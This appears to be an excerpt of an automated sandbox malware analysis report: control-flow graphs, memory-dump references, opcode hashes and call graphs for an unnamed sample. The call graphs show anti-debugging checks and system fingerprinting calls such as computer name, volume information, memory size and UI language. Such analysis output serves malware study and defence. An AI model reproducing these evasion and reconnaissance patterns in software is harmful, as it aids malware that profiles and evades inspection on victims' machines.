                                                                                      control_flow_graph 263 7ff7c08c11e1-7ff7c08c11e5 264 7ff7c08c11ea-7ff7c08c11f9 263->264 265 7ff7c08c11e7-7ff7c08c11e8 263->265 266 7ff7c08c11fc-7ff7c08c129b 264->266 267 7ff7c08c11fb 264->267 265->264 270 7ff7c08c12f6-7ff7c08c1364 ExtractAssociatedIconA 266->270 271 7ff7c08c129d-7ff7c08c12ac 266->271 267->266 276 7ff7c08c1366 270->276 277 7ff7c08c136c-7ff7c08c13a0 call 7ff7c08c13bc 270->277 271->270 272 7ff7c08c12ae-7ff7c08c12b1 271->272 274 7ff7c08c12b3-7ff7c08c12c6 272->274 275 7ff7c08c12eb-7ff7c08c12f3 272->275 278 7ff7c08c12ca-7ff7c08c12dd 274->278 279 7ff7c08c12c8 274->279 275->270 276->277 283 7ff7c08c13a2 277->283 284 7ff7c08c13a7-7ff7c08c13bb 277->284 278->278 281 7ff7c08c12df-7ff7c08c12e7 278->281 279->278 281->275 283->284
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2820718333.00007FF7C08C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c08c0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID: AssociatedExtractIcon
                                                                                      • String ID:
                                                                                      • API String ID: 1041831083-0
                                                                                      • Opcode ID: d335fc07ad09ff45236faa86959b27fc680646febc8b3a7c68bce80bdf1a19b1
                                                                                      • Instruction ID: 84c9a01ac27cd956c90d57e43cc7b7eb97added2232ac99baa29e0855657bfa9
                                                                                      • Opcode Fuzzy Hash: d335fc07ad09ff45236faa86959b27fc680646febc8b3a7c68bce80bdf1a19b1
                                                                                      • Instruction Fuzzy Hash: 74619370518A4D8FEB58EF68D846BF57BE0FB59351F00422AE84DC3252DB75E4818BD1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1007 7ff7c09b3c2d-7ff7c09b3c58 1008 7ff7c09b3c5a-7ff7c09b3c77 1007->1008 1009 7ff7c09b3c97-7ff7c09b3cb1 1007->1009 1010 7ff7c09b3d64-7ff7c09b3d6e 1008->1010 1011 7ff7c09b3c7d-7ff7c09b3c86 1008->1011 1014 7ff7c09b3cb3-7ff7c09b3cbc 1009->1014 1015 7ff7c09b3cbe-7ff7c09b3cc6 1009->1015 1016 7ff7c09b3d70-7ff7c09b3d79 1010->1016 1017 7ff7c09b3d7b-7ff7c09b3dbc 1010->1017 1011->1009 1014->1015 1018 7ff7c09b3dbf-7ff7c09b3e4f 1015->1018 1019 7ff7c09b3ccc-7ff7c09b3cd6 1015->1019 1016->1017 1017->1018 1030 7ff7c09b3e55-7ff7c09b3e5f 1018->1030 1031 7ff7c09b3f93-7ff7c09b4048 1018->1031 1022 7ff7c09b3cef-7ff7c09b3d62 1019->1022 1023 7ff7c09b3cd8-7ff7c09b3ced 1019->1023 1022->1010 1023->1022 1035 7ff7c09b3e61-7ff7c09b3e71 1030->1035 1036 7ff7c09b3e78-7ff7c09b3e7c 1030->1036 1035->1036 1039 7ff7c09b3e82-7ff7c09b3e85 1036->1039 1040 7ff7c09b3f3b-7ff7c09b3f45 1036->1040 1044 7ff7c09b3e87-7ff7c09b3e90 1039->1044 1045 7ff7c09b3e9c-7ff7c09b3ea0 1039->1045 1042 7ff7c09b3f52-7ff7c09b3f90 1040->1042 1043 7ff7c09b3f47-7ff7c09b3f51 1040->1043 1042->1031 1044->1045 1045->1040 1051 7ff7c09b3ea6-7ff7c09b3eac 1045->1051 1055 7ff7c09b3ec8-7ff7c09b3edf 1051->1055 1056 7ff7c09b3eae-7ff7c09b3ebb 1051->1056 1061 7ff7c09b3ee2-7ff7c09b3efa 1055->1061 1062 7ff7c09b3efc 1055->1062 1056->1055 1059 7ff7c09b3ebd-7ff7c09b3ec6 1056->1059 1059->1055 1061->1062 1072 7ff7c09b3efe-7ff7c09b3eff 1061->1072 1066 7ff7c09b3f02 1062->1066 1070 7ff7c09b3f08-7ff7c09b3f11 1066->1070 1073 7ff7c09b3f13-7ff7c09b3f28 1070->1073 1074 7ff7c09b3f2a-7ff7c09b3f3a 1070->1074 1072->1066 1073->1074
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69f3f82271bdfa21481b5ab17a87a241c4f15a0469e7a1123e2eec03a971f65a
                                                                                      • Instruction ID: b39c86c6a8ddaeba52faee9f7d6d4237ef4a4ed8fbed468b08370f6fed3d769f
                                                                                      • Opcode Fuzzy Hash: 69f3f82271bdfa21481b5ab17a87a241c4f15a0469e7a1123e2eec03a971f65a
                                                                                      • Instruction Fuzzy Hash: D5E14731A0DA894FE7A6EB2898547B57BE1FF55320F5802BBD44CC7293DB18E844C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ee8ca755ddd2a65858a8b063d96c556e5b42ecb2db9216188df7b9c4fe39d07
                                                                                      • Instruction ID: 5b8f3eab74e956f72b969c9efc2c73489914e50c684a9d18b2ec776b55d7f9cc
                                                                                      • Opcode Fuzzy Hash: 8ee8ca755ddd2a65858a8b063d96c556e5b42ecb2db9216188df7b9c4fe39d07
                                                                                      • Instruction Fuzzy Hash: 9AC14231A0DA894FE7A5EB6848547B9BBE1FF55334B4801BED84DC7293DB18B804C3A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78d6074111d717439d1a8c3ee205ac7646d8a1326d56bb03d43b3e9ac3c2ac96
                                                                                      • Instruction ID: e9df14e3c3ba8c12f888b29b2944a2a1043abb7076b67e5208d426ee73554bda
                                                                                      • Opcode Fuzzy Hash: 78d6074111d717439d1a8c3ee205ac7646d8a1326d56bb03d43b3e9ac3c2ac96
                                                                                      • Instruction Fuzzy Hash: 03A10661D0DAC94FE766AB3858653B9BBB0FF56724F8801BBD44CC7293DA18A804C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc5008a73196cbd2b8fd0e3ca5d849bc6ccadfba30146f3b2152993e5ea6f363
                                                                                      • Instruction ID: e3b9bac5b161457912939270e5ff9be5e8624687e1b94bd60862af5e544af2a0
                                                                                      • Opcode Fuzzy Hash: bc5008a73196cbd2b8fd0e3ca5d849bc6ccadfba30146f3b2152993e5ea6f363
                                                                                      • Instruction Fuzzy Hash: 4C81F471E0DAC64FE7A6EB684464774BBE1EF12334B9800FEC44DC7293DA18B84593A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 145f85848b9e383c4f798598bce07e2bfb0a39d98a849b8471393fd80ea9e96f
                                                                                      • Instruction ID: f3d7c8d4c45b8ad9e9f16f86bfeebdb0586d442008d7117e8a992cd5113a6c53
                                                                                      • Opcode Fuzzy Hash: 145f85848b9e383c4f798598bce07e2bfb0a39d98a849b8471393fd80ea9e96f
                                                                                      • Instruction Fuzzy Hash: E951C622E0DA858FE7B9AB2854553B8B7E1EF55B70BD801BAC44DC72C3DE18B80583D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3161fb7cfe1c1ae8584202b2daa5a1b1710a7d66407622d77d58118503d47e10
                                                                                      • Instruction ID: 5d8b75fbc65a638406f97599210c9faa0c20f0cf59ef2b97c5e7c9a108740ecc
                                                                                      • Opcode Fuzzy Hash: 3161fb7cfe1c1ae8584202b2daa5a1b1710a7d66407622d77d58118503d47e10
                                                                                      • Instruction Fuzzy Hash: E941F471D0D6C98FE3A6AB3858542B4BBF0EF56634B9801FAD48CC7693DE186816C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: de036cc6431faee953eb0e8cb02064e57ac8ac676074f428d4c0134ee36a5423
                                                                                      • Instruction ID: ce130117fc72d3b908238f8b975cff07848583c5efe7e7cf235f2ec09e23cafc
                                                                                      • Opcode Fuzzy Hash: de036cc6431faee953eb0e8cb02064e57ac8ac676074f428d4c0134ee36a5423
                                                                                      • Instruction Fuzzy Hash: 6C31DC61E0E9C64FF7A5BB3824653B8A6E0EF55B74BD801BAC44DC32C3DE1878444791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ed13935c524b77ceaa435da76abe622381b9cd0bd2c5ee05f49dd44f42103ac
                                                                                      • Instruction ID: 3709825926d40ad583f2b3f648e58d3f3c73f178f753385c512b80ff7726baf3
                                                                                      • Opcode Fuzzy Hash: 5ed13935c524b77ceaa435da76abe622381b9cd0bd2c5ee05f49dd44f42103ac
                                                                                      • Instruction Fuzzy Hash: EC31B861D1EA868FE3B9AB2814553B8A7E0FF51774BC800BAC44DC72D2DE197C4487A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13a9fffed1410d2ab7974880ccc1cd821473561e66f66457c2425d8617491211
                                                                                      • Instruction ID: 2980af4e250515a8ad5a2b290ecd438b95c2cea251f043d7e0b4aae69ff01785
                                                                                      • Opcode Fuzzy Hash: 13a9fffed1410d2ab7974880ccc1cd821473561e66f66457c2425d8617491211
                                                                                      • Instruction Fuzzy Hash: 93119361D0DD8A5FF7B6EA685455278A6D1FF94630B9841BAC80DC3682DF18F80483A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.2827340070.00007FF7C09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C09B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ff7c09b0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9aaad43f446a4d9b4c78240f69f52e81ef0eb5cbf62d98b91e458a6adf7658a9
                                                                                      • Instruction ID: 4956222cd5eeaca4d16982cb024a9589ab137f34f23f83b7cfb619904ea76191
                                                                                      • Opcode Fuzzy Hash: 9aaad43f446a4d9b4c78240f69f52e81ef0eb5cbf62d98b91e458a6adf7658a9
                                                                                      • Instruction Fuzzy Hash: F5E0D810E0EA4D5EE3957A7C58153B8A7C1FF91271FC505B6C448C7293DE1C6946C3A9

                                                                                      Execution Graph

                                                                                      Execution Coverage:17%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:9
                                                                                      Total number of Limit Nodes:0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection
                                                                                      • String ID:
                                                                                      • API String ID: 1722446006-0
                                                                                      • Opcode ID: 44f02f99864801292681d525ed89588051d8f1012b29689db4941ed375ce67c1
                                                                                      • Instruction ID: e5456cbfd78625fff00645d691976ca5e5e658d86839321089d484ea7e6bb9c2
                                                                                      • Opcode Fuzzy Hash: 44f02f99864801292681d525ed89588051d8f1012b29689db4941ed375ce67c1
                                                                                      • Instruction Fuzzy Hash: F2717030518A8D8FDBA9EF28C8457E977E1EF58310F04826AD84DC7792CF74A985CB81

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 396 7ff7c08a1244-7ff7c08a129b 399 7ff7c08a12f6-7ff7c08a1364 ExtractAssociatedIconA 396->399 400 7ff7c08a129d-7ff7c08a12ac 396->400 407 7ff7c08a1366 399->407 408 7ff7c08a136c-7ff7c08a1398 call 7ff7c08a13bc 399->408 400->399 401 7ff7c08a12ae-7ff7c08a12b1 400->401 402 7ff7c08a12b3-7ff7c08a12c6 401->402 403 7ff7c08a12eb-7ff7c08a12f3 401->403 405 7ff7c08a12c8 402->405 406 7ff7c08a12ca-7ff7c08a12dd 402->406 403->399 405->406 406->406 409 7ff7c08a12df-7ff7c08a12e7 406->409 407->408 409->403
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID: AssociatedExtractIcon
                                                                                      • String ID:
                                                                                      • API String ID: 1041831083-0
                                                                                      • Opcode ID: 917b02b2067d723dcfec898b6a0f3c17679f4991fcb217a22f7928c677338856
                                                                                      • Instruction ID: 4bc6ae935a5745ff5da3ac8ddf123d8e3ed491b02321f98c718304716e033a1e
                                                                                      • Opcode Fuzzy Hash: 917b02b2067d723dcfec898b6a0f3c17679f4991fcb217a22f7928c677338856
                                                                                      • Instruction Fuzzy Hash: C8414E30518A4D8FDF98EF6CC8457A97BE1FB58351F50822AE84EC3791DB74E8918B81

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 412 7ff7c08a3175-7ff7c08a318c 414 7ff7c08a31de-7ff7c08a328d CheckRemoteDebuggerPresent 412->414 415 7ff7c08a318e-7ff7c08a319b 412->415 418 7ff7c08a328f 414->418 419 7ff7c08a3295-7ff7c08a32d8 414->419 415->414 418->419
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001E.00000002.2339467985.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_30_2_7ff7c08a0000_753F.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 636ccf2a75031a3b6ed14f41019eb9ea77698a67a860564b39505f9ef092603e
                                                                                      • Instruction ID: 1a9e8be8450ef828f36f892a43236021435c540d6728a2e7a55b4c22029c99bf
                                                                                      • Opcode Fuzzy Hash: 636ccf2a75031a3b6ed14f41019eb9ea77698a67a860564b39505f9ef092603e
                                                                                      • Instruction Fuzzy Hash: 7541317190CA5C8FDB19DF58D845AF97BE0EF66321F04416BD489C7292DB20A816CBA1

                                                                                      Execution Graph

                                                                                      Execution Coverage:14.7%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:34.2%
                                                                                      Total number of Nodes:398
                                                                                      Total number of Limit Nodes:42
                                                                                      execution_graph 13330 2edfb2f 13331 2edfb34 13330->13331 13332 2edfbb9 KiUserCallbackDispatcher GetSystemMetrics 13331->13332 13333 2edfc00 DeleteObject 13332->13333 13335 2edfc5f SelectObject 13333->13335 13337 2edfd1b SelectObject 13335->13337 13338 2edfd47 DeleteObject 13337->13338 13340 2edfd96 13338->13340 13077 2ec7deb 13078 2ec7e2c 13077->13078 13089 2ec6840 13078->13089 13080 2ec7e86 13081 2ec6840 LdrInitializeThunk 13080->13081 13082 2ec7f43 13081->13082 13083 2ec6840 LdrInitializeThunk 13082->13083 13084 2ec802d 13083->13084 13085 2ec6840 LdrInitializeThunk 13084->13085 13086 2ec80ec 13085->13086 13087 2ec6840 LdrInitializeThunk 13086->13087 13088 2ec8b99 13086->13088 13087->13086 13090 2ec6890 13089->13090 13090->13090 13100 2eec380 13090->13100 13092 2ec699c 13096 2ec69c7 13092->13096 13097 2ec69f4 13092->13097 13099 2ec6a02 13092->13099 13110 2eec740 13092->13110 13104 2eec850 13096->13104 13097->13080 13099->13097 13099->13099 13114 2ee9d10 LdrInitializeThunk 13099->13114 13102 2eec3a0 13100->13102 13101 2eec50e 13101->13092 13102->13101 13115 2ee9d10 LdrInitializeThunk 13102->13115 13106 2eec880 13104->13106 13105 2eec9de 13105->13097 13107 2eec8fe 13106->13107 13116 2ee9d10 LdrInitializeThunk 13106->13116 13107->13105 13117 2ee9d10 LdrInitializeThunk 13107->13117 13112 2eec772 13110->13112 13111 2ec69b8 13111->13096 13111->13097 13111->13099 13112->13111 13118 2ee9d10 LdrInitializeThunk 13112->13118 13114->13097 13115->13101 13116->13107 13117->13105 13118->13111 13341 2ecbf25 13342 2ecbf2a 13341->13342 13342->13342 13343 2ecc1c0 LdrInitializeThunk 13342->13343 13344 2ecbfb5 13343->13344 13345 2ee2db8 13348 2eeb840 13345->13348 13349 2ee2dd0 GetUserDefaultUILanguage 13348->13349 13119 2eea479 13122 2eea48a 13119->13122 13120 2eea608 13121 2eea075 13125 2eea0fe 13121->13125 13128 2ee9d10 LdrInitializeThunk 13121->13128 13122->13120 13122->13121 13122->13125 13129 2ee9d10 LdrInitializeThunk 13122->13129 13126 2ee9d10 LdrInitializeThunk 13125->13126 13127 2eea066 13125->13127 13126->13125 13128->13125 13129->13121 13350 2ed0cb7 13353 2ed0610 13350->13353 13352 2ed0780 13353->13352 13354 2eecc00 LdrInitializeThunk 13353->13354 13355 2eed340 13353->13355 13354->13353 13358 2eed370 13355->13358 13356 2eed3de 13357 2ee7e80 RtlAllocateHeap 13356->13357 13362 2eed4be 13356->13362 13360 2eed421 13357->13360 13358->13356 13363 2ee9d10 LdrInitializeThunk 13358->13363 13360->13362 13364 2ee9d10 LdrInitializeThunk 13360->13364 13362->13353 13362->13362 13363->13356 13364->13362 13130 2eda3f6 13131 2eda51f SysAllocString 13130->13131 13132 2eda4d7 13130->13132 13133 2eda591 13131->13133 13132->13131 13365 2ec6fb7 13366 2ec6fbc 13365->13366 13367 2eec380 LdrInitializeThunk 13366->13367 13369 2ec713d 13367->13369 13368 2ec7182 13368->13368 13369->13368 13370 2eec740 LdrInitializeThunk 13369->13370 13371 2ec72d3 13369->13371 13373 2eec850 LdrInitializeThunk 13369->13373 13380 2eb1ee0 13369->13380 13370->13369 13378 2ec737e 13371->13378 13385 2ee9d10 LdrInitializeThunk 13371->13385 13373->13369 13375 2ec7459 13376 2eb2f30 RtlFreeHeap 13375->13376 13377 2ec7541 13376->13377 13378->13375 13378->13377 13379 2eec560 LdrInitializeThunk 13378->13379 13379->13378 13381 2eb1f0c 13380->13381 13383 2eb1ee8 13380->13383 13381->13369 13386 2eb1f10 13383->13386 13384 2eb1f0b 13384->13369 13385->13378 13387 2eb1f25 13386->13387 13392 2eb1f6d 13386->13392 13388 2eb20d7 13387->13388 13390 2eb21ff 13387->13390 13391 2eb2125 13387->13391 13387->13392 13408 2eb3480 13388->13408 13390->13392 13393 2eb2339 13390->13393 13405 2eb227f 13390->13405 13391->13392 13391->13393 13400 2eb2182 13391->13400 13392->13384 13394 2eb2f30 RtlFreeHeap 13393->13394 13394->13392 13395 2eb3480 2 API calls 13395->13405 13396 2eb1f10 2 API calls 13396->13400 13397 2eb2f30 RtlFreeHeap 13397->13392 13398 2eb22bc 13398->13392 13398->13397 13399 2eb2f30 RtlFreeHeap 13399->13398 13400->13392 13400->13396 13400->13398 13406 2eb25e9 13400->13406 13407 2ee7e80 RtlAllocateHeap 13400->13407 13401 2eb1f10 2 API calls 13401->13405 13403 2eb25c3 13404 2eb2f30 RtlFreeHeap 13403->13404 13404->13398 13405->13392 13405->13395 13405->13398 13405->13401 13405->13403 13405->13406 13416 2eb3060 13405->13416 13406->13399 13407->13400 13409 2eb36fa 13408->13409 13410 2eb3494 13408->13410 13409->13392 13410->13409 13415 2ee7e80 RtlAllocateHeap 13410->13415 13411 2eb36d5 13411->13409 13414 2ee7f42 RtlFreeHeap 13411->13414 13412 2eb34df 13412->13409 13413 2ee7e80 RtlAllocateHeap 13412->13413 13413->13411 13414->13409 13415->13412 13418 2eb3074 13416->13418 13419 2eb30f1 13416->13419 13418->13419 13420 2eb3260 13418->13420 13419->13405 13421 2eb3273 13420->13421 13425 2ee7e80 RtlAllocateHeap 13421->13425 13422 2eb3060 RtlAllocateHeap 13423 2eb3302 13422->13423 13423->13422 13424 2eb334a 13423->13424 13424->13419 13425->13423 13134 2ecf6f0 13135 2ecf703 13134->13135 13135->13135 13146 2eecc00 13135->13146 13137 2ecf439 13138 2ecf5e0 13138->13137 13138->13138 13140 2ec97b0 13138->13140 13141 2ec97e0 13140->13141 13150 2eec560 13141->13150 13143 2ec983b 13144 2ec990d 13143->13144 13154 2ecc1c0 13143->13154 13144->13137 13148 2eecc20 13146->13148 13147 2eecd0e 13147->13138 13148->13147 13158 2ee9d10 LdrInitializeThunk 13148->13158 13152 2eec580 13150->13152 13151 2eec6ee 13151->13143 13152->13151 13157 2ee9d10 LdrInitializeThunk 13152->13157 13155 2eec380 LdrInitializeThunk 13154->13155 13156 2ecc219 13155->13156 13157->13151 13158->13147 13426 2ed4b32 13427 2ed477c 13426->13427 13429 2ed493c 13426->13429 13427->13426 13428 2eec380 LdrInitializeThunk 13427->13428 13428->13429 13430 2eec380 LdrInitializeThunk 13429->13430 13430->13429 13431 2ec7189 13434 2ec7180 13431->13434 13432 2eec740 LdrInitializeThunk 13432->13434 13433 2eb1ee0 2 API calls 13433->13434 13434->13431 13434->13432 13434->13433 13435 2eec850 LdrInitializeThunk 13434->13435 13436 2ec72d3 13434->13436 13435->13434 13441 2ec737e 13436->13441 13443 2ee9d10 LdrInitializeThunk 13436->13443 13438 2ec7459 13439 2eb2f30 RtlFreeHeap 13438->13439 13440 2ec7541 13439->13440 13441->13438 13441->13440 13442 2eec560 LdrInitializeThunk 13441->13442 13442->13441 13443->13441 13167 2eca4c5 13168 2eca5d3 13167->13168 13169 2ec6840 LdrInitializeThunk 13168->13169 13171 2eca653 13169->13171 13170 2ec6840 LdrInitializeThunk 13172 2eca79b 13170->13172 13171->13170 13173 2ecca45 13176 2ee7e80 13173->13176 13175 2ecca51 13177 2ee7ef7 RtlAllocateHeap 13176->13177 13178 2ee7ebc 13176->13178 13177->13175 13178->13177 13178->13178 13179 2ee21c4 13180 2eec380 LdrInitializeThunk 13179->13180 13181 2ee21f0 13180->13181 13444 2eb9980 13446 2eb998b 13444->13446 13445 2eb9a6b ExitProcess 13447 2eb99a2 CoInitializeEx 13446->13447 13449 2eb998f 13446->13449 13448 2eb99cb CoInitializeSecurity 13447->13448 13447->13449 13450 2eb9a1f 13448->13450 13449->13445 13455 2eb9a2b 13450->13455 13456 2ebab80 13450->13456 13451 2eb9a5c CoUninitialize 13451->13449 13453 2eb9a32 13453->13455 13462 2ebfcb0 13453->13462 13455->13451 13457 2ebab96 13456->13457 13458 2ebace3 LoadLibraryExW 13457->13458 13460 2ebad02 13458->13460 13461 2ebad23 13460->13461 13466 2ebc270 13460->13466 13461->13453 13463 2ebfcff 13462->13463 13464 2ec016f GetSystemDirectoryW 13463->13464 13465 2ec0199 13463->13465 13464->13465 13465->13455 13468 2ebc300 13466->13468 13467 2ebc325 13467->13461 13468->13467 13469 2ee9c20 2 API calls 13468->13469 13469->13468 13182 2ecec40 13183 2ececaa 13182->13183 13184 2eec560 LdrInitializeThunk 13183->13184 13185 2eceec4 13184->13185 13186 2ecf133 13185->13186 13187 2eceed3 13185->13187 13189 2eceee6 13185->13189 13190 2ecf0b4 13185->13190 13186->13187 13188 2ecc1c0 LdrInitializeThunk 13186->13188 13188->13187 13191 2eec560 LdrInitializeThunk 13189->13191 13190->13190 13192 2eec560 LdrInitializeThunk 13190->13192 13191->13190 13192->13190 13193 2ecb640 13194 2ecb690 13193->13194 13195 2ecb64e 13193->13195 13199 2ecb750 13195->13199 13197 2ecb70c 13197->13194 13203 2ec9950 13197->13203 13200 2ecb7ad 13199->13200 13200->13200 13201 2eec560 LdrInitializeThunk 13200->13201 13202 2ecb8ad 13201->13202 13202->13197 13204 2ec99e0 13203->13204 13205 2ec6840 LdrInitializeThunk 13204->13205 13206 2ec9a4c 13205->13206 13207 2ec6840 LdrInitializeThunk 13206->13207 13208 2ec9b95 13207->13208 13209 2ec6840 LdrInitializeThunk 13208->13209 13210 2ec9d45 13209->13210 13211 2ed2740 13220 2ed2760 13211->13220 13221 2ed27cd 13220->13221 13224 2ee8010 13221->13224 13223 2ed281d 13226 2ee8052 13224->13226 13225 2ee80ce 13227 2ee7e80 RtlAllocateHeap 13225->13227 13230 2ee81be 13225->13230 13226->13225 13232 2ee9d10 LdrInitializeThunk 13226->13232 13229 2ee810b 13227->13229 13229->13230 13233 2ee9d10 LdrInitializeThunk 13229->13233 13230->13223 13232->13225 13233->13230 13470 2ed6f80 13474 2ed6f9b 13470->13474 13471 2ed7884 13472 2ed7fea GetComputerNameExA 13473 2ed8059 13472->13473 13473->13473 13475 2ed811b GetComputerNameExA 13473->13475 13474->13471 13474->13472 13474->13474 13476 2ed817f 13475->13476 13476->13476 13483 2ee3cd0 13476->13483 13478 2ed89fa 13479 2ed8a45 GetPhysicallyInstalledSystemMemory 13478->13479 13480 2ed8a6a 13479->13480 13482 2ed8e13 13480->13482 13502 2ee9d10 LdrInitializeThunk 13480->13502 13484 2ee3d50 13483->13484 13485 2ee3fa5 13484->13485 13489 2ee3fd9 13484->13489 13491 2ee4024 13484->13491 13493 2ee3dfc GetVolumeInformationW 13484->13493 13496 2ee3e20 13484->13496 13485->13478 13486 2eec380 LdrInitializeThunk 13486->13489 13487 2eec380 LdrInitializeThunk 13487->13491 13489->13487 13491->13485 13492 2ee7e80 RtlAllocateHeap 13491->13492 13494 2ee4152 13491->13494 13497 2ee41f2 13491->13497 13499 2ee40ee 13491->13499 13498 2ee4049 13492->13498 13493->13485 13493->13489 13493->13491 13493->13496 13504 2ee8290 13494->13504 13496->13485 13496->13486 13496->13489 13496->13491 13496->13494 13496->13496 13496->13497 13496->13499 13497->13485 13520 2ee9d10 LdrInitializeThunk 13497->13520 13498->13499 13503 2ee9d10 LdrInitializeThunk 13498->13503 13499->13485 13499->13494 13499->13497 13508 2ee84d0 13499->13508 13516 2ee83e0 13499->13516 13502->13482 13503->13499 13505 2ee82a7 13504->13505 13506 2ee839e 13504->13506 13505->13505 13505->13506 13521 2ee9d10 LdrInitializeThunk 13505->13521 13506->13485 13509 2ee86ee 13508->13509 13510 2ee84eb 13508->13510 13509->13499 13510->13509 13510->13510 13514 2ee85ae 13510->13514 13522 2ee9d10 LdrInitializeThunk 13510->13522 13511 2ee86be 13511->13509 13512 2ee83e0 LdrInitializeThunk 13511->13512 13512->13509 13514->13511 13523 2ee9d10 LdrInitializeThunk 13514->13523 13517 2ee849e 13516->13517 13518 2ee83f6 13516->13518 13517->13499 13518->13517 13524 2ee9d10 LdrInitializeThunk 13518->13524 